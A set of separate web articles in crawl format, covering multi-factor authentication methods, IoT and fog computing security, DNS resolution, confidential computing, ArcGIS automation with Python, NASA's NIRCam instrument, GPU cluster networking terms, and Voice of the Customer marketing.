Securing your account is more important than ever. But don't take our word for it: data breaches rose by a shocking 68% last year. A secure account is one that makes use of the right types of authentication. In this day and age, a password alone is not enough. You need multi-factor authentication (MFA). Multi-factor authentication makes it far more difficult for a bad actor to compromise an account. Given how much a security breach can cost, it's a small measure to avoid digital catastrophe. But not all MFA is equal. For National Cybersecurity Month, we're going back to our roots and discussing cybersecurity basics. In this episode of cybersecurity 101, we're covering multi-factor authentication. Keep reading for everything you need to know.

National Cybersecurity Month Basics: What Is Multi-Factor Authentication (MFA)?
Multi-factor authentication (MFA) is an extra layer of security included during the login process. If you've spent any time online, there's a good chance you've heard of two-factor authentication (2FA). There's little difference between these two terms: 2FA requires exactly two forms of authentication, while MFA can require two or more.

The Problem With Passwords
A password is usually the first form of authentication. However, passwords are flawed by design. They're a static string of information that anyone can steal and use. Passwords are often short, making them susceptible to a brute-force attack. A standard desktop computer could crack a 9-character password in as little as 2 hours, and the time to crack a password is even shorter when it includes common words or phrases. Further, employees often fall victim to phishing emails. Despite the best efforts of an IT team, a convincing email could sway an employee into divulging credentials, and it only takes the login info of one unwitting employee to compromise your network. The storage methods for passwords are not all equal, either. Some websites commit the digital faux pas of storing passwords in plain text, or fail to hash and encrypt them properly. It's not enough to expect companies to use the best security practices. Until zero-trust security becomes the norm, password-only authentication is a liability for the integrity of your network. MFA serves as a solution to all this. It introduces another hurdle in the login process, a hurdle that will dissuade all but the most tenacious hackers. For high-security accounts, you can require employees to use additional authentication methods.

Benefits of Multi-Factor Authentication
The benefit is clear: even if a hacker obtains your password, they won't be able to gain access to your account. Regardless, you should do everything in your power to have a strong password. MFA comes in many shapes and forms. There are digital multi-factor authentication methods and physical ones. Some are less secure than others; some are more convenient, but come with important caveats. That means you can choose whichever authentication method works best for your organization, and those with a higher threat level can choose a more sophisticated MFA if necessary. MFA doesn't require much work on your behalf, either. It adds a few seconds at most to the login process, and in turn you increase your security dramatically. Let's discuss the many different types of MFA, their advantages, and their respective weaknesses. No matter which method of MFA you choose, it's better than having no MFA at all.
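To put some rough numbers behind the brute-force claim above, here is a back-of-envelope sketch. The guess rate is an assumption chosen purely for illustration (offline cracking rigs vary enormously), so the outputs are order-of-magnitude estimates, not measurements:

```python
GUESSES_PER_SECOND = 10_000_000_000  # assumed offline attack rate (illustrative)

def worst_case_crack_time(alphabet_size: int, length: int) -> float:
    """Seconds to exhaust every password of this length and alphabet."""
    return alphabet_size ** length / GUESSES_PER_SECOND

# 9 lowercase letters: 26^9 combinations
print(worst_case_crack_time(26, 9) / 3600, "hours")    # ~0.15 hours

# 9 characters drawn from ~94 printable symbols: 94^9 combinations
print(worst_case_crack_time(94, 9) / 86400, "days")    # ~660 days

# Length beats complexity: 14 lowercase letters
print(worst_case_crack_time(26, 14) / (86400 * 365), "years")  # ~200 years
```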
1. One-Time Password (OTP)
A one-time password, as the name implies, is a limited-time password that expires after a single use. You use a different OTP for each subsequent login. In some cases, an organization may require an OTP for every login, even on a recognized device. Support for OTP is growing among many companies; however, it's less common than competing options like SMS and email authentication. Despite this lack of popularity, OTP is among the strongest authentication methods on this list. The most common form of OTP is the code generated by an authenticator app. Google Authenticator is perhaps the most popular authenticator app on the market, but there are many other options, including open-source options for privacy enthusiasts.

How to Use OTP
OTP requires downloading an authenticator app first. You'll need to navigate to your account settings and locate the option to enable MFA or 2FA. Your account provider should then generate a QR code. After you scan this code, your authenticator app will start producing codes, and the provider may ask you to enter the code that appears. Authenticator apps generate a new 6-digit code every 30 seconds, and you need to enter the current code before the 30-second timer runs out.

Advantages and Disadvantages of OTP
OTP is a very strong method of authentication because it presents a considerable impediment to bad actors. In order to obtain your OTP codes, they would need to steal and compromise your mobile device. The authenticator app can itself sit behind several walls of security: there may be biometrics or a PIN code to unlock the phone, and many OTP apps require a biometric or PIN unlock to access them, too. That said, OTP is a bit more involved. You have to type the code in quickly, and if you miss the 30-second window, you have to wait to try again. OTP also requires that you keep your cell phone on hand any time you need to log in. There is also a risk, however slight, that someone steals your mobile device. Even biometrics are not impervious to hacking; depending on the implementation, a hacker could access your device with ease.

2. A Proprietary Authenticator App
An authenticator app for a specific company is one of the most secure types of cybersecurity authentication. A perfect example of this is the Microsoft Authenticator app. Companies store sensitive documents in Office 365, so using their proprietary authenticator keeps those documents safe.

How to Use Proprietary Authenticator Apps
Using Microsoft Authenticator as an example, these apps provide a number of possible ways to access your account. For starters, they can simply send an "approve/deny" notification to your phone anytime someone attempts to log in. Or they can provide a unique OTP that you enter in place of your normal password. A proprietary authenticator app may also require biometrics to authenticate a login.

Advantages and Disadvantages of a Proprietary Authenticator App
As far as digital authentication methods go, this is perhaps the strongest. Rather than just producing an OTP code, the authenticator requires full account access in the first place. The same disadvantages as OTP apply here: if you don't have your mobile device on hand, you cannot log in, and if someone steals your mobile device, there is a small risk they could hack it and access all your accounts.

3. Email and SMS
These are the most common forms of MFA and 2FA. When you log in, the provider sends an email or text message with a login code.
You need to provide this code within the next few minutes to gain access. These are the easiest forms of MFA to use; you just need to wait for the message to arrive.

Advantages and Disadvantages of Email and SMS
As we've mentioned earlier, any form of MFA is better than none at all, and email and SMS are convenient, requiring minimal effort on the user's part. However, this is the least secure method of MFA, particularly SMS messages. Hackers have long been able to hijack your phone number and receive your text messages. Email might be a bit stronger, but hackers can still compromise email accounts. You should prioritize email over SMS, assuming your email has a strong password and MFA itself. For optimal cyber safety, we advise that you avoid SMS at all costs.

Related Reading: Introduction to Email Security

4. Biometrics: Facial Identification, Fingerprint, and Voice
Facial identification has caught on as the easiest method of biometrics. As long as the camera has a clear view of the user with good lighting, verification is almost instant. While even the strongest implementations, like Apple's Face ID, are not impervious, they are difficult to hack. Facial identification works great for mobile devices, but it's less common on desktop computers because it requires a dedicated IR-enabled camera with depth sensors. Windows Hello, while a solid desktop face-unlock solution, is not compatible with the majority of webcams. Fingerprint reading can be just as fast as facial identification, though it tends to be a more mobile-oriented option; many enterprise-grade laptops do feature a fingerprint reader, but it's less common. Voice recognition is the least common of all biometric unlock options, since AI makes it easy to clone a voice and make it say whatever you want, including an unlock phrase.

Advantages and Disadvantages of Biometrics
Biometrics are often the easiest form of authentication. You have access to biometrics at all times, and there's no need to carry around a secondary device. They're also more convenient than OTP or SMS codes, which makes them perfect for an organization where employees use mobile devices as their main source of MFA. On the whole, biometrics tend to be more difficult to hack. While it's not impossible to crack them, doing so often requires bad actors to steal your device and then use sophisticated methods to trick it. Rapid improvements in AI will make biometrics weaker in the coming years: deepfakes, fingerprint copies, and cloned voices all pose a threat to this method. However, AI will likely help to identify these false attempts as well.

5. Physical Device Authentication: A FIDO Security Key, RFID Keycard, or NFC-Enabled Device
A physical device is the gold standard for MFA cybersecurity. This usually comes in the form of a Yubico USB security key, an RFID card, or an NFC-enabled mobile device. It's very difficult for a hacker to compromise a physical key compared to the above options. Security keys are relatively easy to use: when prompted, you insert or tap the key, and authentication is near instant.

Advantages and Disadvantages of Physical Device Authentication
Physical devices are a very strong form of MFA. However, they do come with what could be considered a massive flaw for some: if someone steals your key, they might gain access to your account. That said, FIDO keys are notoriously difficult to clone, and assuming you have a strong password, a thief who has only the key still won't be able to access your account.
Provided you take good care of your FIDO key to prevent theft, it's a strong security option. In the case of RFID, someone only needs to get close to you to clone an RFID badge. With NFC, these risks are mitigated to an extent, but if a hacker succeeded in unlocking your device, you run into the same issue as with authenticator apps. Like authenticator apps, you need the physical device whenever you wish to log in; if you lose it, that could make it very difficult to regain access to your account. Physical keys are great since they are very difficult to spoof without stealing them. If you implement physical keys in your organization, you need to be sure employees will treat them with great care. Attaching them to a keyring that you leave out on your desk, for example, is poor security conduct.

Improve Your Organization's Security Posture
For National Cybersecurity Month, we invite you to strengthen your employees' credentials with multi-factor authentication. It provides a needed layer of security so you don't rely on passwords alone. There are many different types of authentication to choose from, giving you cybersecurity options for any use case. Stronger passwords and MFA are just the beginning. Your organization can benefit from a complete, all-inclusive security solution. That security solution is XDR (extended detection and response). Check out BitLyft today for the next-gen XDR that will secure your network from top to bottom.
<urn:uuid:0de66a1b-2b30-4200-bdca-9f588569ce9c>
CC-MAIN-2024-38
https://www.bitlyft.com/resources/cybersecurity-101-how-to-use-multi-factor-authentication
2024-09-17T05:58:51Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651739.72/warc/CC-MAIN-20240917040428-20240917070428-00771.warc.gz
en
0.942421
2,552
3.03125
3
The oft-used term "the Internet of Things" (IoT) has expanded to encapsulate practically any device (or "thing") with some modicum of compute power that in turn can connect to another device that may or may not be connected to the Internet. The range of products and technologies falling into the IoT bucket is immensely broad, ranging from household refrigerators that can order and restock goods via Amazon, through Smart City traffic flow sensors that feed navigation systems to avoid jams, to implanted heart monitors that can send emergency updates via the patient's smartphone to a cardiovascular surgeon on vacation in the Maldives.

The information security community, and in fact the InfoSec industry at large, has struggled and mostly failed to secure the IoT. This does not bode well for the next evolutionary advancement of networked compute technology. Today's IoT security problems are caused and compounded by some pretty hefty design limitations, ranging from power consumption, physical size and shock resistance, environmental exposure, and cost per unit, to the manufacturer's overall security knowledge and development capability. The next evolutionary step is already underway, and it exposes a different kind of threat and attack surface than IoT does.

As each device we use, and each component we incorporate into our products and services, becomes smart, there is a growing need for a "brain of brains". In most technology use cases, it makes no sense to have every smart device independently connecting to the Internet and expecting a cloud-based system to make sense of it all and control it. It's simply not practical for every device to use the cloud the way smartphones do: sending everything to the cloud to be processed, having their data stored in the cloud, and having the cloud return the processed results back to the phone.

Consider the coming generation of automobiles. Every motor, servo, switch, and meter within the vehicle will be independently smart, monitoring the device's performance, configuration, optimal tuning, and fault status. A self-driving car needs to instantaneously process this huge volume of data from several hundred devices, and passing it to the cloud and back again just isn't viable. Instead, the vehicle needs to handle its own processing and storage, independent of the cloud, yet still be interconnected.

The concepts behind this shift in computing power and intelligence are increasingly referred to as "Fog Computing". In essence, computing nodes closest to the collective of smart devices within a product (e.g. a self-driving car) or environment (e.g. a product assembly line) must be able to handle the high volumes of data and the velocity of data generation, and provide services that standardize, correlate, reduce, and control the data elements that will be passed to the cloud. These smart(er) aggregation points are in turn referred to as "Fog Nodes".

Evolutionarily, this means that computing power is shifting to the edges of the network. Centralization of computing resources and processing within the cloud revolutionized the Information Technology industry. "Edge Computing" is the next advancement, and it's already underway. If the InfoSec industry has been so unsuccessful in securing the IoT, what is the probability it will be more successful with Fog Computing and eventually Edge Computing paradigms?
My expectation is that securing Fog and Edge computing environments will actually be simpler, and many of the problems with IoT will likely be overcome as the insecure devices themselves become subsumed in the Fog. A limitation of securing the IoT has been the processing power of the embedded computing system within each device. As these devices begin to report in and communicate through aggregation nodes, I anticipate that those nodes will have substantially more computing power and will be capable of securing and validating the communications of all the dumb-smart devices they front. As computing power shifts to the edge of the network, so too will security.

Over the years, corporate computing needs have shifted from centralized mainframes, to distributed workstations, to centralized and public cloud, and next into decentralized Edge Computing. Security technologies and threat analytics have followed a parallel path. While the InfoSec industry has failed to secure the millions upon millions of IoT devices already deployed, the cure likely lies in the more powerful Fog Nodes and smart edges of the network that do have the compute power necessary to analyze threats and mitigate them. That all said, Edge Computing also means that there will be an entirely new class of device, isolated and exposed to attack. These edge devices will not only have to protect the less-smart devices they proxy control for, but will have to be able to protect themselves too. Nobody ever said the life of an InfoSec professional was dull.
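To picture the aggregation role a Fog Node plays, here is a deliberately simplified Python sketch. Every function and value in it is a hypothetical stand-in; the point is only that raw readings are standardized and reduced locally, so a compact summary, rather than the raw stream, is what crosses the link to the cloud:

```python
import statistics
import time

def read_sensors() -> list[float]:
    """Stand-in for polling a few hundred attached smart devices."""
    return [20.0 + i * 0.01 for i in range(300)]  # fake temperature readings

def forward_to_cloud(summary: dict) -> None:
    """Stand-in for an MQTT/HTTPS publish to a cloud backend."""
    print("uplink:", summary)

# In a real fog node this loop would run indefinitely; three iterations
# keep the demo short.
for _ in range(3):
    window = read_sensors()
    # Standardize, correlate, and reduce at the edge: only a compact
    # summary (not 300 raw samples) crosses the WAN link.
    forward_to_cloud({
        "n": len(window),
        "mean": round(statistics.fmean(window), 2),
        "max": max(window),
        "min": min(window),
    })
    time.sleep(1)  # a real node might send one upstream message per minute
```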
<urn:uuid:57e50824-764d-49e0-a5d7-a9c97956e51e>
CC-MAIN-2024-38
https://circleid.com/posts/20161227_edge_computing_fog_computing_iot_and_securing_them_all/
2024-09-18T12:25:23Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651895.12/warc/CC-MAIN-20240918100941-20240918130941-00671.warc.gz
en
0.933072
981
2.75
3
What is DNS and How Does it Work?
DNS, which stands for Domain Name System, is a crucial component of the internet infrastructure that allows human-friendly web addresses (domain names) to be translated into machine-readable IP addresses. It acts as a distributed database that helps computers and network devices locate and connect with each other over the Internet.

Here's how DNS works:

Domain Names: Every device connected to the Internet, such as a web server, computer, or other networked device, has an IP address, which is a numeric identifier. However, remembering IP addresses for every website or service is impractical for humans. That's where domain names come in: domain names are human-readable addresses associated with specific IP addresses.

Domain Name Hierarchy: The domain name system is organized in a hierarchical structure. The hierarchy consists of different levels, separated by dots. The highest level is the root domain, followed by top-level domains (TLDs), second-level domains, and so on. For example, in the domain "www.example.com," ".com" is the TLD, "example" is the second-level domain, and "www" is a subdomain.

DNS Resolvers: When you type a domain name into your web browser (e.g., www.example.com), your computer needs to obtain the corresponding IP address. It starts by contacting a DNS resolver, typically provided by your Internet Service Provider (ISP) or configured manually. The DNS resolver is responsible for finding the IP address associated with the requested domain.

DNS Query: If the DNS resolver doesn't have the IP address in its cache (a temporary store of previously resolved domain names), it initiates a DNS query. The query is sent to the root DNS servers, which provide information about the TLD servers.

TLD Servers: The TLD servers direct the query to the authoritative name servers responsible for the requested domain within that TLD. For example, if the TLD is ".com," the query is directed through the name servers for the ".com" TLD.

Authoritative Name Servers: The authoritative name servers are responsible for storing and providing information about domain names within a specific domain. They return the IP address associated with the requested domain name.

Caching: Once the DNS resolver receives the IP address, it stores the information in its cache for a certain period (the Time-to-Live, or TTL). This caching mechanism improves the efficiency of future DNS queries by avoiding the need to repeatedly query authoritative name servers for frequently accessed domain names.

Response to Client: The DNS resolver returns the IP address to the client device (e.g., your computer), which can then use this information to connect to the desired server.

In summary, DNS serves as a critical translation service, converting human-readable domain names into machine-readable IP addresses. This systematic and hierarchical process enables efficient and scalable navigation on the internet by simplifying the way we access websites and services.
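From a program's point of view, all of the recursion described above hides behind a single resolver call. A minimal Python sketch (example.com is just an illustrative domain, and the addresses returned will vary):

```python
import socket

def resolve(domain: str) -> list[str]:
    """Ask the OS's DNS resolver for the IPv4 addresses behind a name."""
    infos = socket.getaddrinfo(domain, None, family=socket.AF_INET)
    # Each entry is (family, type, proto, canonname, sockaddr);
    # sockaddr for IPv4 is (ip_address, port).
    return sorted({info[4][0] for info in infos})

print(resolve("example.com"))  # e.g. ['93.184.216.34']
```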
<urn:uuid:cfc45d54-2979-4234-a6fc-8e89f46ae432>
CC-MAIN-2024-38
https://www.fortypoundhead.com/showcontent.asp?artid=1164
2024-09-18T11:26:43Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651895.12/warc/CC-MAIN-20240918100941-20240918130941-00671.warc.gz
en
0.911302
671
4.15625
4
Transferring data across shared environments comes with an element of risk, as the organization can lose some control over how that data is managed and protected. Think about threat actors that exploit a vulnerability in an application which gives them kernel access to the underlying operating system. From there, they can perform screen scrapes, memory dumps and more, because the operating system is controlling how the data is processed in memory.

By contrast, a confidential computing approach essentially keeps data secure the whole time it is undergoing analysis or computation. The trusted execution environment serves as a gateway between any data that's being used in memory and any code that requests to access that data, whether it's an operating system or application. Even if attackers could execute a memory dump, the data that they would be able to access in memory would come out encrypted.

We're regularly seeing more hardware and firmware vulnerabilities come to light. I believe that is in large part due to the industry getting better at dealing with software vulnerabilities. In many cases, however, hardware vulnerabilities are currently the soft underbelly of cloud technologies. For that reason, I expect to see increasing numbers of adversaries trying to exploit the weaknesses of hardware and firmware to gain access to data in use. As businesses become increasingly aware of this risk, I expect confidential computing to rapidly grow in popularity.

Financial services will likely start rolling it out first, since heavy regulations usually mean financial institutions lead other industry sectors when it comes to any type of data security. I expect other industries will follow suit fairly quickly. Healthcare and insurance organizations will probably be a close follower after the big banks, as will critical infrastructure organizations, such as defense firms and power companies, because they are often in the crosshairs of adversaries trying to steal or manipulate data.

While awareness of the issue is just now starting to emerge, confidential computing is a technology that every business should be aware of. In the near future, every organization that processes critical data in the cloud should be evaluating whether its cloud providers are using confidential computing to secure data in use.
<urn:uuid:b72b88a4-e528-4c82-9b35-f5b095e43391>
CC-MAIN-2024-38
https://apac.magazine.intelligentcio.com/intelligent-cio-apac-issue-34/0661506001683129582/p46
2024-09-11T05:35:47Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651344.44/warc/CC-MAIN-20240911052223-20240911082223-00471.warc.gz
en
0.94488
438
2.578125
3
The Importance of Automation in Mapping

A geographic information system (GIS) can be used to display spatial data, as well as to analyze and manipulate that data to solve problems. ESRI's ArcGIS software and Python can be used together to solve geographic problems. Python is a free, open-source programming language used to create scripts that run in conjunction with ArcGIS. Read What is Python? for additional information.

It is assumed that you have some background and understanding of basic geoprocessing: GIS operations used to manipulate spatial data, including buffering, clipping, and merging data sets. Read What is geoprocessing? to review how geoprocessing tools such as Project and Clip can be sequenced to automate work and solve problems. Perhaps you need to classify certain soil types along a river in a community to provide inputs for a model. You may not need all the detailed types available, so you merge similar types based on an attribute, buffer the river, and clip the soils layer with both the community polygon and the river buffer. It makes sense to do this manually for a single dataset, but if this needs to be run multiple times in many different areas, the process could be automated in several different ways to make it easier, less prone to error, and faster.

It does take extra time to set up the automated process, test it to make certain that it gives the correct results, and solve problems that may show up when running a process on a wide variety of inputs. This presents a trade-off which needs to be weighed when deciding whether to automate a process. Once you are familiar with automating tasks, it may be worthwhile to automate the process even if it will only be done two or three times.

There are several ways to automate a tool for multiple inputs in ArcGIS:
- Create a batch process by right-clicking on a tool and choosing batch process. This works well when only a single tool needs to be run on many different inputs.
- Use ModelBuilder to create a sequence of tools, where the output of one tool is used as the input to the next.
- Run Python scripts to run a tool automatically or as part of a sequence of tools.
- Write a program directly in ArcObjects, using the same building blocks employed by ESRI developers.

The Essential Python Vocabulary describes the terminology used to understand geoprocessing with Python. The ArcGIS Console is a good place to start learning some Python for GIS. It runs each line of code as it is entered, providing immediate feedback and help on Python commands specific to GIS. Select the Python icon shown in Figure 1, or select Geoprocessing > Python from the menu bar, to open the Python Window in ArcGIS.

Figure 1: ArcGIS Menubar

The command prompt is shown below in Figure 2.

Figure 2: ArcGIS Console

A great feature of the console is that you can type a variable name and it will display the current value immediately on the next line before it again shows the prompt (>>>).
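As a sketch of what the soil-classification workflow above might look like as a script, here is a hedged arcpy example. The geodatabase, layer names, field name, and buffer distance are all hypothetical placeholders, and the classic tool-call style (Dissolve_management, Buffer_analysis, Clip_analysis) is one of several ways arcpy exposes these tools:

```python
import arcpy

# Hypothetical workspace and layer names; substitute your own data.
arcpy.env.workspace = "C:/data/community.gdb"
arcpy.env.overwriteOutput = True

# Merge similar soil types once, by dissolving on a classification field.
arcpy.Dissolve_management("soils_detailed", "soils_general", "SOIL_CLASS")

# Repeat the buffer-and-clip sequence for any number of rivers.
for river in ["river_north", "river_south"]:
    buf = f"{river}_buffer"
    arcpy.Buffer_analysis(river, buf, "500 Meters")               # buffer the river
    arcpy.Clip_analysis("soils_general", buf, f"{river}_soils")   # clip to the buffer
    arcpy.Clip_analysis(f"{river}_soils", "community_poly",       # clip to the community
                        f"{river}_soils_final")
```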
<urn:uuid:8c3f094b-f02b-44f4-b428-abbd970706db>
CC-MAIN-2024-38
https://electricala2z.com/python-programming/automation-in-mapping/
2024-09-11T06:06:48Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651344.44/warc/CC-MAIN-20240911052223-20240911082223-00471.warc.gz
en
0.916781
638
3.53125
4
It's well known that training large models is done on clusters of machines, preferably with many GPUs per server. This article will introduce the professional terminology and common network architecture of GPU computing.

Exploring Key Components in GPU Computing

PCIe Switch Chip
In the domain of high-performance GPU computing, vital elements such as CPUs, memory modules, NVMe storage, GPUs, and network cards establish connections via the PCIe (Peripheral Component Interconnect Express) bus or specialized PCIe switch chips.

NVLink is a wire-based, serial, multi-lane, near-range communications link developed by NVIDIA. Unlike PCI Express, a device can consist of multiple NVLinks, and devices use mesh networking to communicate instead of a central hub. The protocol was first announced in March 2014 and uses a proprietary high-speed signaling interconnect (NVHS). The technology supports full-mesh interconnection between GPUs on the same node, and the progression from NVLink 1.0 through NVLink 2.0 and 3.0 to NVLink 4.0 has significantly increased bidirectional bandwidth, improving the performance of GPU computing applications.

NVSwitch is a switching chip developed by NVIDIA, designed specifically for high-performance computing and artificial intelligence applications. Its primary function is to provide high-speed, low-latency communication between multiple GPUs within the same host. Unlike the NVSwitch, which is integrated into GPU modules within a single host, the NVLink Switch serves as a standalone switch specifically engineered for linking GPUs in a distributed computing environment.

Several GPU manufacturers have taken innovative approaches to the memory-speed bottleneck by stacking multiple DRAM dies to form so-called high-bandwidth memory (HBM) and integrating it with the GPU. This design removes the need for each GPU to traverse the PCIe switch chip when engaging its dedicated memory. As a result, this strategy significantly increases data transfer speeds, potentially by orders of magnitude.

In large-scale GPU training, performance is directly tied to data transfer speeds along pathways such as PCIe, main memory, NVLink, HBM, and the network, and different bandwidth units are used to measure these data rates.

Storage Network Card
The storage network card in a GPU architecture connects to the CPU via PCIe, enabling communication with distributed storage systems. It plays a crucial role in the efficient data reading and writing needed for deep learning model training. Additionally, the storage network card handles node management tasks, including SSH (Secure Shell) remote login, system performance monitoring, and collecting related data. These tasks help monitor and maintain the running status of the GPU cluster. For a more in-depth exploration of these terms, you can refer to the article Unveiling the Foundations of GPU Computing-1 from the FS community.

High-Performance GPU Fabric
In a full-mesh network topology, each node is connected directly to all the other nodes. Usually, 8 GPUs are connected in a full-mesh configuration through six NVSwitch chips, also referred to as an NVSwitch fabric. This fabric optimizes data transfer with bidirectional bandwidth, providing efficient communication between GPUs and supporting parallel computing tasks. The bandwidth per link depends on the NVLink generation utilized, such as NVLink 3.0, enhancing overall performance in large-scale GPU clusters.
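One way to see this topology from software is to ask which GPU pairs support direct peer-to-peer access; NVLink/NVSwitch paths typically do. A minimal sketch using PyTorch, assuming a CUDA build of PyTorch is installed on a multi-GPU host:

```python
import torch

# Report which GPU pairs can talk directly (peer-to-peer), which is the
# case when they share an NVLink/NVSwitch or a suitable PCIe path.
n = torch.cuda.device_count()
for i in range(n):
    for j in range(n):
        if i != j and torch.cuda.can_device_access_peer(i, j):
            print(f"GPU {i} <-> GPU {j}: peer access available")

# On NVIDIA systems, `nvidia-smi topo -m` prints the same topology as a
# matrix, labeling links as NV# (NVLink), PIX/PXB (PCIe), and so on.
```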
IDC GPU Fabric

The fabric mainly comprises a computing network and a storage network. The computing network connects GPU nodes and supports the collaboration of parallel computing tasks: transferring data between multiple GPUs, sharing calculation results, and coordinating the execution of massively parallel workloads. The storage network connects GPU nodes to storage systems to support large-scale data read and write operations, such as loading data from the storage system into GPU memory and writing calculation results back. Want to know more about GPU fabric? Please check the article Unveiling the Foundations of GPU Computing-2 from the FS community. A minimal sketch below shows one way the computing network is exercised during training.
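As an illustration only, not taken from the FS article, here is a hedged PyTorch sketch of the gradient all-reduce that drives traffic over the computing network during data-parallel training. It assumes `torch.distributed` has already been initialized with an appropriate backend (for example, NCCL).

```python
# Sketch: gradient averaging across GPU nodes via the computing network.
# Assumes dist.init_process_group(backend="nccl", ...) was called at startup.
import torch
import torch.distributed as dist

def average_gradients(model: torch.nn.Module) -> None:
    """All-reduce each gradient tensor across ranks, then average."""
    world_size = dist.get_world_size()
    for param in model.parameters():
        if param.grad is not None:
            # Sum this gradient across every GPU in the job, then divide,
            # so all ranks step with the same averaged gradient.
            dist.all_reduce(param.grad, op=dist.ReduceOp.SUM)
            param.grad /= world_size
```

In practice, wrappers such as DistributedDataParallel perform this communication automatically and overlap it with the backward pass; the sketch simply makes the network traffic explicit.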
Lockheed Martin and the University of Arizona have handed over to NASA an imaging instrument for the James Webb Space Telescope ahead of the observatory's planned 2018 start of deep space research. The near-infrared camera has been integrated into the telescope's integrated science instrument module to function as the primary imaging component, Lockheed said Wednesday. Marcia Rieke, a Regents' Professor in the University of Arizona's Department of Astronomy/Steward Observatory and principal investigator for the NIRCam program, said NASA intends for NIRCam to find candidate planets in deep space and study how planetary systems form using the JWST. The development team worked to integrate Teledyne-built infrared detector arrays and optical performance measuring devices into the imaging equipment, as well as to test the technology at a Lockheed facility in Palo Alto, Calif. "Now, NIRCam and the other instruments will be tested to prove their ability to function as a unit," said Jeff Vanden Beukel, Lockheed NIRCam program director. The Webb telescope is a joint project of NASA, the European Space Agency and the Canadian Space Agency.
When it comes to technology, Apple is one of the most recognizable and influential brands in the business, known for its sleek designs, innovative products, and exceptional customer experience. Apple co-founder Steve Jobs learned the value of customer experience early on. During a presentation at the 1997 Worldwide Developer Conference, Jobs said: "One of the things I've always found is that you've got to start with the customer experience and work backwards to the technology. You can't start with the technology and try to figure out where you're going to try to sell it. […] As we have tried to come up with a strategy and a vision for Apple, it started with, 'What incredible benefits can we give to the customer? Where can we take the customer?'"

Jobs's message is one that organizations across every industry should take to heart. Customer experience is the new competitive battlefield; in order to maintain market share and get ahead, companies must heavily factor customer experience into everything from product development to sales and marketing strategy. In order to do that, though, organizations must start by listening to the Voice of the Customer. Before we get started, let's review some terminology related to Voice of the Customer.

- Voice of the Customer: Called VoC for short, Voice of the Customer refers to the process by which businesses capture customer perceptions in order to gain a firsthand perspective on what the customer experience is like and how consumers are talking about their brand, product, or service. In doing so, businesses also gain a more holistic view of what their target audience wants, needs, and expects. There are any number of ways to approach this process, including running focus groups, conducting customer surveys, evaluating social sentiment, and reading customer reviews.
- Customer Perceived Value: Customer perceived value refers to the value that customers assign to a product or service based on whether they believe it will meet their needs or expectations. Typically, when determining the perceived value of an item, customers will weigh its perceived benefit against its perceived cost. If the perceived benefit outweighs the perceived cost, the item will have a positive customer perceived value; if the inverse is true, the item will have a negative customer perceived value. The customer perceived value of a product or service depends on a number of factors, including its actual price and reputation; that said, if a business is able to convince consumers that its product or service is a triple threat — that is, that it offers physical, logical, and emotional benefits — it's likely to secure a high customer perceived value.
- Customer Journey: Customer journey can refer to one of two similar, but slightly different, processes, depending on the perspective from which you look at it. From the consumer's perspective, the customer journey describes the entire buying process, starting with initial awareness of a need or a problem and ending with a purchase. From a business perspective, the customer journey is the complete sum of experiences a customer has with the brand. As a result, this version of the customer journey tends to be longer, because it extends all the way from the consumer's first interaction with marketing materials to ongoing efforts from the business to retain that customer and turn them into a brand advocate.
To that end, companies must take care to nurture the customer at every stage of the journey in order to win not only their short-term business, but also their long-term loyalty.

- Moments of Truth: Moment of truth is a marketing term used to describe a pivotal moment in the customer journey in which a consumer forms their opinion of a brand, product, or service. The moment of truth is most commonly the consumer's first interaction with a brand, product, or service; however, some sources claim that there are as many as five moments of truth in the customer journey, including when the consumer researches a product prior to purchase and when the consumer (now customer) provides feedback on the product or service.
- Market Research: Market research describes the collective efforts an organization takes to gather information about its target audience, specifically their needs and preferences. Market research typically falls into one of two main categories: primary research and secondary research. The process of conducting primary research is similar to capturing the Voice of the Customer in that it involves using phone interviews, online surveys, focus groups, and so on to collect information. Secondary research requires a business to review documentation from both internal and external sources — market reports, sales data, thought leadership articles, and so on — and draw conclusions from there.
- Qualitative Research: Qualitative research is a research methodology that involves the analysis of unstructured and non-numerical data, such as text, video, or audio. With Voice of the Customer, qualitative research data might take the form of survey and interview responses, audio recordings from focus group sessions, and so on.
- Quantitative Research: Quantitative research is a research methodology that involves the analysis of statistical and numerical data. With Voice of the Customer, quantitative research data might take the form of yes/no questions, customer rankings, CSAT and NPS scoring, and so on.
- Product Development: Product development refers to the process by which businesses bring a product from a concept or idea to a tangible item. The traditional new product development lifecycle consists of eight stages: Idea Generation, Idea Screening, Concept Development, Business Strategy Development, Product Development, Test Marketing, Commercialization, and Introduction.

The Impact of Voice of the Customer on Business

By now, you've likely heard numerous industry publications and thought leaders tout the importance of customer experience — perhaps even to the point where it seems tiresome. But CX has become a buzzword for good reason: according to one oft-cited statistic, 89% of companies report competing primarily on the basis of customer experience. According to another, more recent report, experience-driven companies are able to increase revenue 1.4x more than other companies; those same companies were also able to increase customer lifetime value 1.6x more than other companies. By 2020, CX is expected to overtake price and product as the key brand differentiator. Given the vast opportunities CX presents and the significant impact it has on business, it's a bit easier to forgive various outlets for talking about it ad nauseam. This is also why Voice of the Customer is so important — without a concrete understanding of customers' motivations and desires, it's nearly impossible to deliver an experience that not just meets but completely exceeds their expectations.
And that's just one benefit; by implementing a Voice of the Customer program in your organization, you can also:

- Identify potential brand crises before they take place. Even something as simple as a single negative product review can point to a larger issue. By monitoring present public sentiment about your brand or product, you can identify potential problems before they have the chance to turn into a full-blown crisis. In addition to supporting crisis prevention, you can also leverage Voice of the Customer for crisis management. In the immediate aftermath of a major event, keep an ear to the ground and listen to what people have to say about your brand's response, how they've been affected, and whether they believe you've successfully resolved the issue at hand.
- Test out new concepts and ideas. Have an idea for a new product or service, but don't want to invest in a full product development lifecycle until you know, with relative certainty, that it'll be a success? Put it to the test with Voice of the Customer! Solicit feedback on new concepts and ideas from your existing customer base to see whether they have a chance of taking off or will be dead on arrival.
- Give customers what they actually want. Rather than simply guess at what your customers want and risk disappointment, go directly to the source. One of the key benefits of VoC is that it provides an accurate look at how customers think and feel, what pain points they need resolved, and what they want and expect from a brand, product, or service.
- Increase customer retention — and revenue. By consistently delivering goods and services that align with expectations and resolve common challenges, you're more likely to win customers' long-term business and increase your profit margins accordingly.

Common Voice of the Customer Techniques & Questions

